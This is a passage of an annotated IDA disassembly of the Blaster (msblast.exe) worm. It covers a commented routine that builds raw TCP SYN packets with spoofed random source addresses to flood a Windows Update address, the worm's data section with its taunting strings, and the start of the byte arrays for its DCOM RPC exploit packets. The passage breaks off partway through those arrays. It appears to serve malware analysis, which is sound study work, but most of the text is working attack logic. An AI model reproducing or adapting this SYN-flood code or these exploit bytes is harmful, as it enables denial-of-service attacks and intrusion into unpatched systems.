BYTE time-to-live .text:00401F36 -0B BYTE protocol .text:00401F36 -0A WORD checksum .text:00401F36 -08 DWORD source IP address .text:00401F36 -04 DWORD dest IP address .text:00401F36 .text:00401F36 TCP header: .text:00401F36 .text:00401F36 -28 WORD source port .text:00401F36 -26 WORD dest port .text:00401F36 -24 DWORD sequence number .text:00401F36 -20 DWORD ack number .text:00401F36 -1C BYTE header length .text:00401F36 -1B BYTE flags .text:00401F36 -1A WORD window size .text:00401F36 -18 WORD checksum .text:00401F36 -16 WORD urgent pointer .text:00401F36 .text:00401F36 IP "pseudoheader" for computing TCP checksum (RFC 793): .text:00401F36 .text:00401F36 -70 DWORD source IP address .text:00401F36 -6C DWORD dest IP address .text:00401F36 -68 BYTE 0 .text:00401F36 -67 BYTE protocol (6: TCP) .text:00401F36 -66 WORD TCP header length .text:00401F36 .text:00401F36 ; =============== S U B R O U T I N E ======================================= .text:00401F36 .text:00401F36 ; Attributes: bp-based frame .text:00401F36 .text:00401F36 sendTCP80SYN proc near ; CODE XREF: WUSYNFloodThread+55^p .text:00401F36 .text:00401F36 temprand2 = dword ptr -9Ch .text:00401F36 temprand1 = dword ptr -98h .text:00401F36 name = byte ptr -92h .text:00401F36 destport = word ptr -82h .text:00401F36 to = sockaddr ptr -80h .text:00401F36 pseudoheader = byte ptr -70h .text:00401F36 buf = byte ptr -64h .text:00401F36 tcpheader = byte ptr -28h .text:00401F36 ipv4header = byte ptr -14h .text:00401F36 dwDestIP = dword ptr 8 .text:00401F36 s = dword ptr 0Ch .text:00401F36 .text:00401F36 push ebp .text:00401F37 mov ebp, esp .text:00401F39 sub esp, 9Ch .text:00401F3F push ebx .text:00401F40 push esi .text:00401F41 push edi .text:00401F42 .text:00401F42 Initialization .text:00401F42 .text:00401F42 lea edi, [ebp+buf] .text:00401F45 lea esi, ds:4047B0h ; g_zerobuf60[] .text:00401F4B mov ecx, 0Fh .text:00401F50 rep movsd ; copy 60 byte buffer of zeroes into buf .text:00401F52 mov [ebp+destport], 50h ; destination port (80) .text:00401F5B call GetTickCount .text:00401F60 push eax .text:00401F61 call srand ; seed random number generator with GetTickCount() .text:00401F66 .text:00401F66 Create random source address for spoofing .text:00401F66 .text:00401F66 call rand .text:00401F6B mov [ebp+temprand1], eax .text:00401F71 call rand .text:00401F76 mov ecx, 0FFh .text:00401F7B cdq .text:00401F7C idiv ecx .text:00401F7E push edx ; fourth octet (random 0..254) .text:00401F7F mov edi, [ebp+temprand1] .text:00401F85 mov eax, edi .text:00401F87 mov ecx, 0FFh .text:00401F8C cdq .text:00401F8D idiv ecx .text:00401F8F push edx ; third octet (random 0..254) .text:00401F90 push ds:synspoofoctet2 .text:00401F96 push ds:synspoofoctet1 .text:00401F9C push offset aI_I_I_I ; "%i.%i.%i.%i" .text:00401FA1 lea edi, [ebp+name] .text:00401FA7 push edi .text:00401FA8 call sprintf .text:00401FAD lea eax, [ebp+name] .text:00401FB3 push eax ; name .text:00401FB4 call lookupIPAddr .text:00401FB9 mov ebx, eax ; save source address to spoof in EBX .text:00401FBB .text:00401FBB Fill in target address (sockaddr) struct .text:00401FBB .text:00401FBB mov [ebp+to.sa_family], 2 ; AF_INET .text:00401FC1 movzx eax, [ebp+destport] .text:00401FC8 push eax ; hostshort .text:00401FC9 call htons .text:00401FCE mov edi, eax .text:00401FD0 mov word ptr [ebp+to.sa_data], di ; destination port (80) .text:00401FD4 mov eax, [ebp+dwDestIP] .text:00401FD7 mov dword ptr [ebp+to.sa_data+2], eax .text:00401FDA .text:00401FDA Construct IPv4 header .text:00401FDA .text:00401FDA mov [ebp+ipv4header], 45h ; first byte of raw IP packet: .text:00401FDA ; IPv4 / 20-byte header .text:00401FDE push 28h ; hostshort .text:00401FE0 call htons .text:00401FE5 mov edi, eax .text:00401FE7 mov word ptr [ebp+ipv4header+2], di ; total length = 40 bytes .text:00401FEB mov word ptr [ebp+ipv4header+4], 1 .text:00401FF1 mov word ptr [ebp+ipv4header+6], 0 ; flags = 0 .text:00401FF7 mov [ebp+ipv4header+8], 80h ; TTL = 128 .text:00401FFB mov [ebp+ipv4header+9], 6 ; protocol = TCP (6) .text:00401FFF mov word ptr [ebp+ipv4header+0Ah], 0 ; IP checksum .text:00402005 mov eax, [ebp+dwDestIP] .text:00402008 mov dword ptr [ebp+ipv4header+10h], eax ; destination IP (Windows Update) .text:0040200B .text:0040200B Begin constructing TCP header .text:0040200B .text:0040200B movzx eax, [ebp+destport] .text:00402012 push eax ; hostshort .text:00402013 call htons .text:00402018 mov edi, eax .text:0040201A mov word ptr [ebp+tcpheader+2], di ; destination port (80) .text:0040201E and dword ptr [ebp+tcpheader+8], 0 ; zero out ack number .text:00402022 mov [ebp+tcpheader+0Ch], 50h ; header length (50h --> 20 bytes) .text:00402026 mov [ebp+tcpheader+0Dh], 2 ; flags: 2 = SYN .text:0040202A push 4000h ; hostshort .text:0040202F call htons .text:00402034 mov edi, eax .text:00402036 mov word ptr [ebp+tcpheader+0Eh], di ; window size: 16384 .text:0040203A mov word ptr [ebp+tcpheader+12h], 0 ; urgent ptr .text:00402040 mov word ptr [ebp+tcpheader+10h], 0 ; TCP checksum .text:00402046 mov eax, dword ptr [ebp+ipv4header+10h] .text:00402049 .text:00402049 Construct IP pseudoheader .text:00402049 .text:00402049 mov dword ptr [ebp+pseudoheader+4], eax ; destination IP (windowsupdate.com) .text:0040204C mov [ebp+pseudoheader+8], 0 ; store 0 in pseudoheader .text:00402050 mov [ebp+pseudoheader+9], 6 ; store protocol (6: TCP) in pseudoheader .text:00402054 push 14h ; hostshort .text:00402056 call htons .text:0040205B mov edi, eax .text:0040205D mov word ptr [ebp+pseudoheader+0Ah], di ; store TCP header size (20) in pseudoheader .text:00402061 .text:00402061 Finish filling in IPv4 and TCP headers .text:00402061 .text:00402061 mov dword ptr [ebp+ipv4header+0Ch], ebx ; source address .text:00402064 call rand .text:00402069 mov ecx, 3E8h .text:0040206E cdq .text:0040206F idiv ecx .text:00402071 mov edi, edx .text:00402073 add edi, 3E8h .text:00402079 and edi, 0FFFFh ; (rand() % 1000) + 1000 .text:0040207F push edi ; hostshort .text:00402080 call htons .text:00402085 mov edi, eax .text:00402087 mov word ptr [ebp+tcpheader], di ; first bytes of TCP header: .text:00402087 ; source port = random 1000..1999 .text:0040208B call rand .text:00402090 mov [ebp+temprand2], eax .text:00402096 call rand .text:0040209B mov edi, [ebp+temprand2] .text:004020A1 shl edi, 10h .text:004020A4 or edi, eax .text:004020A6 and edi, 0FFFFh .text:004020AC push edi ; hostshort .text:004020AD call htons ; htons( ((rand() << 16) | rand()) & 0xFFFF ) .text:004020B2 mov edi, eax .text:004020B4 and edi, 0FFFFh .text:004020BA mov dword ptr [ebp+tcpheader+4], edi ; sequence number .text:004020BD mov dword ptr [ebp+pseudoheader], ebx ; source address .text:004020C0 .text:004020C0 Calculate and store IPv4 and TCP checksums .text:004020C0 .text:004020C0 push 0Ch .text:004020C2 lea eax, [ebp+pseudoheader] .text:004020C5 push eax .text:004020C6 lea eax, [ebp+buf] .text:004020C9 push eax .text:004020CA call memcpy ; copy IP pseudoheader into buf[] .text:004020CF push 14h .text:004020D1 lea eax, [ebp+tcpheader] .text:004020D4 push eax .text:004020D5 lea eax, [ebp+buf+0Ch] ; &(buf[0x0C]) .text:004020D8 push eax .text:004020D9 call memcpy ; copy TCP header after pseudoheader into buf[] .text:004020DE push 20h ; dwLength .text:004020E0 lea eax, [ebp+buf] .text:004020E3 push eax ; lpData .text:004020E4 call computeChecksum ; compute checksum of (IP pseudoheader + TCP header) .text:004020E9 mov edi, eax .text:004020EB mov word ptr [ebp+tcpheader+10h], di ; store TCP checksum in TCP header .text:004020EF push 14h .text:004020F1 lea eax, [ebp+ipv4header] .text:004020F4 push eax .text:004020F5 lea eax, [ebp+buf] .text:004020F8 push eax .text:004020F9 call memcpy ; now copy IPv4 header into buf[] .text:004020FE push 14h .text:00402100 lea eax, [ebp+tcpheader] .text:00402103 push eax .text:00402104 lea eax, [ebp+buf+14h] ; &(buf[0x14]) .text:00402107 push eax .text:00402108 call memcpy ; copy TCP header after IPv4 header in buf[] .text:0040210D push 4 .text:0040210F push 0 .text:00402111 lea eax, [ebp+buf+28h] .text:00402114 push eax .text:00402115 call memset .text:0040211A push 28h ; dwLength: 28h (40) .text:0040211C lea eax, [ebp+buf] .text:0040211F push eax ; lpData: buf .text:00402120 call computeChecksum .text:00402125 mov edi, eax .text:00402127 mov word ptr [ebp+ipv4header+0Ah], di ; store IPv4 checksum in IPv4 header .text:0040212B .text:0040212B Send TCP SYN packet to destination IP address .text:0040212B .text:0040212B push 14h .text:0040212D lea eax, [ebp+ipv4header] .text:00402130 push eax .text:00402131 lea eax, [ebp+buf] .text:00402134 push eax .text:00402135 call memcpy ; copy IPv4 header to buffer .text:0040213A add esp, 78h .text:0040213D push 10h ; tolen .text:0040213F lea eax, [ebp+to] .text:00402142 push eax ; to .text:00402143 push 0 ; flags .text:00402145 push 28h ; len = 40 bytes .text:00402147 lea eax, [ebp+buf] .text:0040214A push eax ; buf .text:0040214B push [ebp+s] ; s .text:0040214E call sendto ; -- send 40-byte raw IP packet .text:00402153 pop edi .text:00402154 pop esi .text:00402155 pop ebx .text:00402156 leave .text:00402157 retn .text:00402157 sendTCP80SYN endp .text:00402157 .text:00402158 ; [00000006 BYTES: COLLAPSED FUNCTION htons. PRESS KEYPAD "+" TO EXPAND] .text:0040215E dd 9090h .text:00402162 align 4 .text:00402164 ; [00000006 BYTES: COLLAPSED FUNCTION ioctlsocket. PRESS KEYPAD "+" TO EXPAND] .text:0040216A align 8 .text:00402170 ; [00000006 BYTES: COLLAPSED FUNCTION inet_addr. PRESS KEYPAD "+" TO EXPAND] .text:00402176 dd 9090h .text:0040217A align 4 .text:0040217C ; [00000006 BYTES: COLLAPSED FUNCTION inet_ntoa. PRESS KEYPAD "+" TO EXPAND] .text:00402182 align 8 .text:00402188 ; [00000006 BYTES: COLLAPSED FUNCTION recvfrom. PRESS KEYPAD "+" TO EXPAND] .text:0040218E dd 9090h .text:00402192 align 4 .text:00402194 ; [00000006 BYTES: COLLAPSED FUNCTION select. PRESS KEYPAD "+" TO EXPAND] .text:0040219A align 8 .text:004021A0 ; [00000006 BYTES: COLLAPSED FUNCTION send. PRESS KEYPAD "+" TO EXPAND] .text:004021A6 dd 9090h .text:004021AA align 4 .text:004021AC ; [00000006 BYTES: COLLAPSED FUNCTION sendto. PRESS KEYPAD "+" TO EXPAND] .text:004021B2 align 8 .text:004021B8 ; [00000006 BYTES: COLLAPSED FUNCTION setsockopt. PRESS KEYPAD "+" TO EXPAND] .text:004021BE dd 9090h .text:004021C2 align 4 .text:004021C4 ; [00000006 BYTES: COLLAPSED FUNCTION socket. PRESS KEYPAD "+" TO EXPAND] .text:004021CA align 8 .text:004021D0 ; [00000006 BYTES: COLLAPSED FUNCTION gethostbyname. PRESS KEYPAD "+" TO EXPAND] .text:004021D6 dd 9090h .text:004021DA align 4 .text:004021DC ; [00000006 BYTES: COLLAPSED FUNCTION bind. PRESS KEYPAD "+" TO EXPAND] .text:004021E2 align 8 .text:004021E8 ; [00000006 BYTES: COLLAPSED FUNCTION gethostname. PRESS KEYPAD "+" TO EXPAND] .text:004021EE dd 9090h .text:004021F2 align 4 .text:004021F4 ; [00000006 BYTES: COLLAPSED FUNCTION closesocket. PRESS KEYPAD "+" TO EXPAND] .text:004021FA align 8 .text:00402200 ; [00000006 BYTES: COLLAPSED FUNCTION WSAStartup. PRESS KEYPAD "+" TO EXPAND] .text:00402206 dd 9090h .text:0040220A align 4 .text:0040220C ; [00000006 BYTES: COLLAPSED FUNCTION WSACleanup. PRESS KEYPAD "+" TO EXPAND] .text:00402212 align 8 .text:00402218 ; [00000006 BYTES: COLLAPSED FUNCTION connect. PRESS KEYPAD "+" TO EXPAND] .text:0040221E dd 9090h .text:00402222 align 4 .text:00402224 ; [00000006 BYTES: COLLAPSED FUNCTION getpeername. PRESS KEYPAD "+" TO EXPAND] .text:0040222A align 8 .text:00402230 ; [00000006 BYTES: COLLAPSED FUNCTION getsockname. PRESS KEYPAD "+" TO EXPAND] .text:00402236 dd 9090h .text:0040223A align 4 .text:0040223C ; [00000006 BYTES: COLLAPSED FUNCTION WSASocketA. PRESS KEYPAD "+" TO EXPAND] .text:00402242 align 8 .text:00402248 ; [00000006 BYTES: COLLAPSED FUNCTION InternetGetConnectedState. PRESS KEYPAD "+" TO EXPAND] .text:0040224E dd 9090h .text:00402252 align 4 .text:00402254 .text:00402254 ; =============== S U B R O U T I N E ======================================= .text:00402254 .text:00402254 ; Attributes: bp-based frame .text:00402254 .text:00402254 sub_402254 proc near ; CODE XREF: start+66^p .text:00402254 .text:00402254 var_4 = dword ptr -4 .text:00402254 .text:00402254 push ebp .text:00402255 mov ebp, esp .text:00402257 push ecx .text:00402258 push edi .text:00402259 call GetCommandLineA .text:0040225E mov edi, eax .text:00402260 cmp byte ptr [edi], 22h .text:00402263 jnz short loc_402288 .text:00402265 push 22h .text:00402267 mov eax, edi .text:00402269 inc eax .text:0040226A push eax .text:0040226B call strchr .text:00402270 add esp, 8 .text:00402273 mov [ebp+var_4], eax .text:00402276 or eax, eax .text:00402278 jz short loc_4022A3 .text:0040227A mov edi, eax .text:0040227C inc edi .text:0040227D jmp short loc_402280 .text:0040227F ; --------------------------------------------------------------------------- .text:0040227F .text:0040227F loc_40227F: ; CODE XREF: sub_402254+2Fvj .text:0040227F inc edi .text:00402280 .text:00402280 loc_402280: ; CODE XREF: sub_402254+29^j .text:00402280 cmp byte ptr [edi], 20h .text:00402283 jz short loc_40227F .text:00402285 jmp short loc_4022A3 .text:00402287 ; --------------------------------------------------------------------------- .text:00402287 .text:00402287 loc_402287: ; CODE XREF: sub_402254+3Evj .text:00402287 inc edi .text:00402288 .text:00402288 loc_402288: ; CODE XREF: sub_402254+F^j .text:00402288 movsx eax, byte ptr [edi] .text:0040228B or eax, eax .text:0040228D jz short loc_402294 .text:0040228F cmp eax, 20h .text:00402292 jnz short loc_402287 .text:00402294 .text:00402294 loc_402294: ; CODE XREF: sub_402254+39^j .text:00402294 jmp short loc_402297 .text:00402296 ; --------------------------------------------------------------------------- .text:00402296 .text:00402296 loc_402296: ; CODE XREF: sub_402254+4Dvj .text:00402296 inc edi .text:00402297 .text:00402297 loc_402297: ; CODE XREF: sub_402254+40^j .text:00402297 movsx eax, byte ptr [edi] .text:0040229A or eax, eax .text:0040229C jz short loc_4022A3 .text:0040229E cmp eax, 20h .text:004022A1 jz short loc_402296 .text:004022A3 .text:004022A3 loc_4022A3: ; CODE XREF: sub_402254+24^j .text:004022A3 ; sub_402254+31^j ... .text:004022A3 push 0 ; lpModuleName .text:004022A5 call GetModuleHandleA .text:004022AA push 1 .text:004022AC push edi .text:004022AD push 0 .text:004022AF push eax .text:004022B0 call WinMain .text:004022B5 pop edi .text:004022B6 leave .text:004022B7 retn .text:004022B7 sub_402254 endp .text:004022B7 .text:004022B8 .text:004022B8 ; =============== S U B R O U T I N E ======================================= .text:004022B8 .text:004022B8 .text:004022B8 allocstackspace proc near ; CODE XREF: infectTarget+8^p .text:004022B8 pop ecx .text:004022B9 .text:004022B9 loc_4022B9: ; CODE XREF: allocstackspace+14vj .text:004022B9 sub esp, 1000h .text:004022BF sub eax, 1000h .text:004022C4 test [esp], eax .text:004022C7 cmp eax, 1000h .text:004022CC jnb short loc_4022B9 .text:004022CE sub esp, eax .text:004022D0 test [esp], eax .text:004022D3 jmp ecx .text:004022D3 allocstackspace endp .text:004022D3 .text:004022D3 ; --------------------------------------------------------------------------- .text:004022D5 align 4 .text:004022D8 ; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess. PRESS KEYPAD "+" TO EXPAND] .text:004022DE dd 9090h .text:004022E2 align 4 .text:004022E4 ; [00000006 BYTES: COLLAPSED FUNCTION ExitThread. PRESS KEYPAD "+" TO EXPAND] .text:004022EA align 8 .text:004022F0 ; [00000006 BYTES: COLLAPSED FUNCTION GetCommandLineA. PRESS KEYPAD "+" TO EXPAND] .text:004022F6 dd 9090h .text:004022FA align 4 .text:004022FC ; [00000006 BYTES: COLLAPSED FUNCTION GetDateFormatA. PRESS KEYPAD "+" TO EXPAND] .text:00402302 align 8 .text:00402308 ; [00000006 BYTES: COLLAPSED FUNCTION GetLastError. PRESS KEYPAD "+" TO EXPAND] .text:0040230E dd 9090h .text:00402312 align 4 .text:00402314 ; [00000006 BYTES: COLLAPSED FUNCTION GetModuleFileNameA. PRESS KEYPAD "+" TO EXPAND] .text:0040231A align 8 .text:00402320 ; [00000006 BYTES: COLLAPSED FUNCTION GetModuleHandleA. PRESS KEYPAD "+" TO EXPAND] .text:00402326 dd 9090h .text:0040232A align 4 .text:0040232C ; [00000006 BYTES: COLLAPSED FUNCTION CloseHandle. PRESS KEYPAD "+" TO EXPAND] .text:00402332 align 8 .text:00402338 ; [00000006 BYTES: COLLAPSED FUNCTION GetTickCount. PRESS KEYPAD "+" TO EXPAND] .text:0040233E dd 9090h .text:00402342 align 4 .text:00402344 ; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND] .text:0040234A align 8 .text:00402350 ; [00000006 BYTES: COLLAPSED FUNCTION CreateMutexA. PRESS KEYPAD "+" TO EXPAND] .text:00402356 dd 9090h .text:0040235A align 4 .text:0040235C ; [00000006 BYTES: COLLAPSED FUNCTION Sleep. PRESS KEYPAD "+" TO EXPAND] .text:00402362 align 8 .text:00402368 ; [00000006 BYTES: COLLAPSED FUNCTION TerminateThread. PRESS KEYPAD "+" TO EXPAND] .text:0040236E dd 9090h .text:00402372 align 4 .text:00402374 ; [00000006 BYTES: COLLAPSED FUNCTION CreateThread. PRESS KEYPAD "+" TO EXPAND] .text:0040237A align 8 .text:00402380 ; [00000006 BYTES: COLLAPSED FUNCTION RegCloseKey. PRESS KEYPAD "+" TO EXPAND] .text:00402386 dd 9090h .text:0040238A align 4 .text:0040238C ; [00000006 BYTES: COLLAPSED FUNCTION RegCreateKeyExA. PRESS KEYPAD "+" TO EXPAND] .text:00402392 align 8 .text:00402398 ; [00000006 BYTES: COLLAPSED FUNCTION RegSetValueExA. PRESS KEYPAD "+" TO EXPAND] .text:0040239E dd 9090h .text:004023A2 align 4 .text:004023A4 ; [00000006 BYTES: COLLAPSED FUNCTION __GetMainArgs. PRESS KEYPAD "+" TO EXPAND] .text:004023AA align 8 .text:004023B0 ; [00000006 BYTES: COLLAPSED FUNCTION atoi. PRESS KEYPAD "+" TO EXPAND] .text:004023B6 dd 9090h .text:004023BA align 4 .text:004023BC ; [00000006 BYTES: COLLAPSED FUNCTION exit. PRESS KEYPAD "+" TO EXPAND] .text:004023C2 align 8 .text:004023C8 ; [00000006 BYTES: COLLAPSED FUNCTION fclose. PRESS KEYPAD "+" TO EXPAND] .text:004023CE dd 9090h .text:004023D2 align 4 .text:004023D4 ; [00000006 BYTES: COLLAPSED FUNCTION fopen. PRESS KEYPAD "+" TO EXPAND] .text:004023DA align 8 .text:004023E0 ; [00000006 BYTES: COLLAPSED FUNCTION fread. PRESS KEYPAD "+" TO EXPAND] .text:004023E6 dd 9090h .text:004023EA align 4 .text:004023EC ; [00000006 BYTES: COLLAPSED FUNCTION memcpy. PRESS KEYPAD "+" TO EXPAND] .text:004023F2 align 8 .text:004023F8 ; [00000006 BYTES: COLLAPSED FUNCTION memset. PRESS KEYPAD "+" TO EXPAND] .text:004023FE dd 9090h .text:00402402 align 4 .text:00402404 ; [00000006 BYTES: COLLAPSED FUNCTION raise. PRESS KEYPAD "+" TO EXPAND] .text:0040240A align 8 .text:00402410 ; [00000006 BYTES: COLLAPSED FUNCTION rand. PRESS KEYPAD "+" TO EXPAND] .text:00402416 dd 9090h .text:0040241A align 4 .text:0040241C ; [00000006 BYTES: COLLAPSED FUNCTION signal. PRESS KEYPAD "+" TO EXPAND] .text:00402422 align 8 .text:00402428 ; [00000006 BYTES: COLLAPSED FUNCTION sprintf. PRESS KEYPAD "+" TO EXPAND] .text:0040242E dd 9090h .text:00402432 align 4 .text:00402434 ; [00000006 BYTES: COLLAPSED FUNCTION srand. PRESS KEYPAD "+" TO EXPAND] .text:0040243A align 8 .text:00402440 ; [00000006 BYTES: COLLAPSED FUNCTION strchr. PRESS KEYPAD "+" TO EXPAND] .text:00402446 dd 9090h .text:0040244A align 4 .text:0040244C ; [00000006 BYTES: COLLAPSED FUNCTION strtok. PRESS KEYPAD "+" TO EXPAND] .text:00402452 align 8 .text:00402452 _text ends .text:00402452 .bss:00403000 ; Section 2. (virtual address 00003000) .bss:00403000 ; Virtual size : 0000013C ( 316.) .bss:00403000 ; Section size in file : 00000000 ( 0.) .bss:00403000 ; Offset to raw data for section: 00000000 .bss:00403000 ; Flags C0000080: Bss Readable Writable .bss:00403000 ; Alignment : 16 bytes ? .bss:00403000 ; --------------------------------------------------------------------------- .bss:00403000 .bss:00403000 ; Segment type: Uninitialized .bss:00403000 ; Segment permissions: Read/Write .bss:00403000 _bss segment para public 'BSS' use32 .bss:00403000 assume cs:_bss .bss:00403000 ;org 403000h .bss:00403000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing .bss:00403000 ; char cp .bss:00403000 cp db 10h dup(?) ; DATA XREF: infect20Hosts+91^o .bss:00403000 ; infect20Hosts+9E^o ... .bss:00403010 octet2 dd ? ; DATA XREF: WinMain+1C6^w .bss:00403010 ; WinMain+219^r ... .bss:00403014 synspoofoctet1 dd ? ; DATA XREF: WinMain+103^w .bss:00403014 ; WinMain+214^w ... .bss:00403018 db ? ; .bss:00403019 db ? ; .bss:0040301A db ? ; .bss:0040301B db ? ; .bss:0040301C db ? ; .bss:0040301D db ? ; .bss:0040301E db ? ; .bss:0040301F db ? ; .bss:00403020 ; CHAR Filename .bss:00403020 Filename db 104h dup(?) ; DATA XREF: WinMain+B9^o .bss:00403020 ; TFTPServerThread+BF^o .bss:00403020 ; 260 (104h) = MAX_PATH .bss:00403124 ; SOCKET s .bss:00403124 s dd ? ; DATA XREF: TFTPServerThread+21^w .bss:00403124 ; TFTPServerThread+6B^r ... .bss:00403128 octet1 dd ? ; DATA XREF: WinMain+1A9^w .bss:00403128 ; WinMain+20F^r ... .bss:0040312C octet4 dd ? ; DATA XREF: WinMain+E0^w .bss:0040312C ; incrementOctets^r ... .bss:00403130 octet3 dd ? ; DATA XREF: WinMain+1E6^w .bss:00403130 ; WinMain+209^w ... .bss:00403134 dwWhichRetAddr dd ? ; DATA XREF: WinMain+246^w .bss:00403134 ; WinMain+262^w ... .bss:00403138 synspoofoctet2 dd ? ; DATA XREF: WinMain+116^w .bss:00403138 ; WinMain+21E^w ... .bss:00403138 _bss ends .bss:00403138 .data:0040313C ; Section 3. (virtual address 00004000) .data:0040313C ; Virtual size : 0000088C ( 2188.) .data:0040313C ; Section size in file : 0000088C ( 2188.) .data:0040313C ; Offset to raw data for section: 00001A00 .data:0040313C ; Flags C0000040: Data Readable Writable .data:0040313C ; Alignment : 16 bytes ? .data:0040313C ; --------------------------------------------------------------------------- .data:0040313C .data:0040313C ; Segment type: Pure data .data:0040313C ; Segment permissions: Read/Write .data:0040313C _data segment para public 'DATA' use32 .data:0040313C assume cs:_data .data:0040313C ;org 40313Ch .data:0040313C align 1000h .data:00404000 dd offset cp .data:00404004 dd 40313Ch .data:00404008 dd 8000h .data:0040400C dd 0 .data:00404010 dword_404010 dd 0 ; DATA XREF: .text:00401142^w .data:00404010 ; .text:0040115C^w ... .data:00404014 dword_404014 dd 0 ; DATA XREF: start+60^w .data:00404018 db 0 ; .data:00404019 db 0 ; .data:0040401A db 0 ; .data:0040401B db 0 ; .data:0040401C unk_40401C db 0 ; ; DATA XREF: start+B^o .data:0040401D db 0 ; .data:0040401E db 0 ; .data:0040401F db 0 ; .data:00404020 dword_404020 dd 0 ; DATA XREF: start+44^o .data:00404020 ; start+5A^r .data:00404024 dword_404024 dd 0 ; DATA XREF: start+3F^o .data:00404024 ; start+54^r .data:00404028 dword_404028 dd 0 ; DATA XREF: start+3A^o .data:00404028 ; start+4E^r .data:0040402C dword_40402C dd 0 ; DATA XREF: .text:004011AA^r .data:0040402C ; .text:004011BA^r .data:00404030 dword_404030 dd 0 ; DATA XREF: .text:004010AB^w .data:00404034 dword_404034 dd 0 ; DATA XREF: .text:004010B0^w .data:00404034 ; .text:004010C8^w .data:00404038 dwTFTPInProgress dd 0 ; DATA XREF: TFTPServerThread+C^w .data:00404038 ; TFTPServerThread+174^w ... .data:0040403C aMsblast_exe db 'msblast.exe',0 ; DATA XREF: WinMain+31^o .data:0040403C ; infectTarget+3BA^o ... .data:00404048 aIJustWantToSay db 'I just want to say LOVE YOU SAN!!',0 .data:0040406A aBillyGatesWhyD db 'billy gates why do you make this possible ? Stop making mone' .data:0040406A db 'y and fix your software!!',0 .data:004040C0 .data:004040C0 Static exploit packet components (from http://www.metasploit.com/tools/dcom.c) .data:004040C0 .data:004040C0 bindstr db 5, 0, 0Bh, 3, 10h, 0, 0, 0, 48h, 0, 0, 0, 7Fh, 0, 0, 0; 0 .data:004040C0 db 0D0h, 16h,0D0h, 16h, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0; 16 .data:004040C0 db 0A0h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0, 0, 0, 0, 46h; 32 .data:004040C0 db 0, 0, 0, 0, 4, 5Dh, 88h, 8Ah,0EBh, 1Ch,0C9h, 11h, 9Fh,0E8h, 8, 0; 48 .data:004040C0 db 2Bh, 10h, 48h, 60h, 2, 0, 0, 0; 64 .data:00404108 request1 db 5, 0, 0, 3, 10h, 0, 0, 0,0E8h, 3, 0, 0,0E5h, 0, 0, 0; 0 .data:00404108 db 0D0h, 3, 0, 0, 1, 0, 4, 0, 5, 0, 6, 0, 1, 0, 0, 0; 16 .data:00404108 db 0, 0, 0, 0, 32h, 24h, 58h,0FDh,0CCh, 45h, 64h, 49h,0B0h, 70h,0DDh,0AEh; 32 .data:00404108 db 74h, 2Ch, 96h,0D2h, 60h, 5Eh, 0Dh, 0, 1, 0, 0, 0, 0, 0, 0, 0; 48 .data:00404108 db 70h, 5Eh, 0Dh, 0, 2, 0, 0, 0, 7Ch, 5Eh, 0Dh, 0, 0, 0, 0, 0; 64 .data:00404108 db 10h, 0, 0, 0, 80h, 96h,0F1h,0F1h, 2Ah, 4Dh,0CEh, 11h,0A6h, 6Ah, 0, 20h; 80 .data:00404108 db 0AFh, 6Eh, 72h,0F4h, 0Ch, 0, 0, 0, 4Dh, 41h, 52h, 42h, 1, 0, 0, 0; 96 .data:00404108 db 0, 0, 0, 0, 0Dh,0F0h,0ADh,0BAh, 0, 0, 0, 0,0A8h,0F4h, 0Bh, 0; 112 .data:00404108 db 60h, 3, 0, 0, 60h, 3, 0, 0, 4Dh, 45h, 4Fh, 57h, 4, 0, 0, 0; 128 .data:00404108 db 0A2h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0, 0, 0, 0, 46h; 144 .data:00404108 db 38h, 3, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0, 0, 0, 0, 46h; 160 .data:00404108 db 0, 0, 0, 0, 30h, 3, 0, 0, 28h, 3, 0, 0, 0, 0, 0, 0; 176 .data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh,0C8h, 0, 0, 0, 4Dh, 45h, 4Fh, 57h; 192 .data:00404108 db 28h, 3, 0, 0,0D8h, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0; 208 .data:00404108 db 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 224 .data:00404108 db 0, 0, 0, 0,0C4h, 28h,0CDh, 0, 64h, 29h,0CDh, 0, 0, 0, 0, 0; 240 .data:00404108 db 7, 0, 0, 0,0B9h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 256 .data:00404108 db 0, 0, 0, 46h,0ABh, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 272 .data:00404108 db 0, 0, 0, 46h,0A5h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 288 .data:00404108 db 0, 0, 0, 46h,0A6h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 304 .data:00404108 db 0, 0, 0, 46h,0A4h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 320 .data:00404108 db 0, 0, 0, 46h,0ADh, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 336 .data:00404108 db 0, 0, 0, 46h,0AAh, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 352 .data:00404108 db 0, 0, 0, 46h, 7, 0, 0, 0, 60h, 0, 0, 0, 58h, 0, 0, 0; 368 .data:00404108 db 90h, 0, 0, 0, 40h, 0, 0, 0, 20h, 0, 0, 0, 78h, 0, 0, 0; 384 .data:00404108 db 30h, 0, 0, 0, 1, 0, 0, 0, 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh; 400 .data:00404108 db 50h, 0, 0, 0, 4Fh,0B6h, 88h, 20h,0FFh,0FFh,0FFh,0FFh, 0, 0, 0, 0; 416 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 432 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 448 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 464 .data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 480 .data:00404108 db 0, 0, 0, 0, 